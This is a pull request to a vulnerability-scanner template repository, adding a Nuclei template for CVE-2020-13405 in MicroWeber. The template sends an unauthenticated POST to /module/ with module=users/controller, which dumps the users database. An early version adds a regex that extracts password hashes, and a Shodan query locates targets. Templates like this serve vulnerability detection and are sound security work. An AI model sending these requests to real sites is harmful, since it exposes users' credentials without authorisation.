### PR TITLE
Create CVE-2020-13405

### DIFF
--- a/cves/2020/CVE-2020-13405.yaml
+++ b/cves/2020/CVE-2020-13405.yaml
@@ -32,9 +32,9 @@ requests:
         group: 1
         part: body
         regex:
-         - '<span class=sf-dump-key>password</span>" => "<span class=sf-dump-str title="60 characters">(.*)</span>'
+          - '<span class=sf-dump-key>password</span>" => "<span class=sf-dump-str title="60 characters">(.*)</span>'
 
-    matchers:   
+    matchers:
       - type: dsl
         dsl:
           - 'contains(body,"username")'

--- a/cves/2020/CVE-2020-13405.yaml
+++ b/cves/2020/CVE-2020-13405.yaml
@@ -12,7 +12,7 @@ info:
   metadata:
     verified: true
     shodan-query: http.html:"microweber"
-  tags: cve,cve2020,microweber,disclosure
+  tags: cve,cve2020,microweber,unauth
 
 requests:
   - raw:
@@ -22,13 +22,7 @@ requests:
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
         Referer: {{BaseURL}}admin/view:modules/load_module:users
 
-        module={{endpoint}}
-
-    payloads:
-      endpoint:
-        - "users/controller"
-        - "modules/users/controller"
-        - "/modules/users/controller"
+        module=users/controller
 
     matchers:
       - type: dsl

--- a/cves/2020/CVE-2020-13405.yaml
+++ b/cves/2020/CVE-2020-13405.yaml
@@ -2,13 +2,17 @@ id: CVE-2020-13405
 
 info:
   name: MicroWeber - Unauthenticated User Database Disclosure
-  author: ritikchaddha, amit-jd
-  severity: critical
-  description: The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML.
-
+  author: ritikchaddha,amit-jd
+  severity: high
+  description: |
+    The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML.
   reference:
     - https://rhinosecuritylabs.com/research/microweber-database-disclosure/
-  tags: cve,cve2020,disclosure
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-13405
+  metadata:
+    verified: true
+    shodan-query: http.html:"microweber"
+  tags: cve,cve2020,microweber,disclosure
 
 requests:
   - raw:
@@ -22,17 +26,9 @@ requests:
 
     payloads:
       endpoint:
-        - "users%2Fcontroller"
-        - "modules%2Fusers%2Fcontroller"
-        - "%2Fmodules%2Fusers%2Fcontroller"
-
-    extractors:
-      - type: regex
-        name: password-hash
-        group: 1
-        part: body
-        regex:
-          - '<span class=sf-dump-key>password</span>" => "<span class=sf-dump-str title="60 characters">(.*)</span>'
+        - "users/controller"
+        - "modules/users/controller"
+        - "/modules/users/controller"
 
     matchers:
       - type: dsl

--- a/cves/2020/CVE-2020-13405.yaml
+++ b/cves/2020/CVE-2020-13405.yaml
@@ -12,7 +12,7 @@ info:
   metadata:
     verified: true
     shodan-query: http.html:"microweber"
-  tags: cve,cve2020,microweber,unauth
+  tags: cve,cve2020,microweber,unauth,disclosure
 
 requests:
   - raw:
@@ -22,7 +22,13 @@ requests:
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
         Referer: {{BaseURL}}admin/view:modules/load_module:users
 
-        module=users/controller
+        module={{endpoint}}
+
+    payloads:
+      endpoint:
+        - "users/controller"
+        - "modules/users/controller"
+        - "/modules/users/controller"
 
     matchers:
       - type: dsl

--- a/cves/2020/CVE-2020-13405.yaml
+++ b/cves/2020/CVE-2020-13405.yaml
@@ -1,0 +1,45 @@
+id: CVE-2020-13405
+
+info:
+  name: MicroWeber - Unauthenticated User Database Disclosure
+  author: ritikchaddha, amit-jd
+  severity: critical
+  description: The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML.
+
+  reference:
+    - https://rhinosecuritylabs.com/research/microweber-database-disclosure/
+  tags: cve,cve2020,disclosure
+
+requests:
+  - raw:
+      - |
+        POST /module/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Referer: {{BaseURL}}admin/view:modules/load_module:users
+
+        module={{endpoint}}
+
+    payloads:
+      endpoint:
+        - "users%2Fcontroller"
+        - "modules%2Fusers%2Fcontroller"
+        - "%2Fmodules%2Fusers%2Fcontroller"
+
+    extractors:
+      - type: regex
+        name: password-hash
+        group: 1
+        part: body
+        regex:
+         - '<span class=sf-dump-key>password</span>" => "<span class=sf-dump-str title="60 characters">(.*)</span>'
+
+    matchers:   
+      - type: dsl
+        dsl:
+          - 'contains(body,"username")'
+          - 'contains(body,"password")'
+          - 'contains(body,"password_reset_hash")'
+          - 'status_code==200'
+          - 'contains(all_headers,"text/html")'
+        condition: and


### PR DESCRIPTION
### Template / PR Information

**MicroWeber - Unauthenticated User Database Disclosure** (Affected version _<= 1.1.19_)

```
<?php
dd(User::all());
```
The PHP code for _controller.php_ run Laravel's dump and die function on the users' database and simply prints the contents of the users' database to the browser.
<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2020-13405
- References:
- [https://rhinosecuritylabs.com/research/microweber-database-disclosure/](url)

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)
![image](https://user-images.githubusercontent.com/78851976/181483308-a3bc1dfe-e3ca-437d-b81b-dd1ebabf0c82.png)
![image](https://user-images.githubusercontent.com/78851976/181485889-9e73aace-50ea-468e-afb1-67e55f7cdc71.png)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)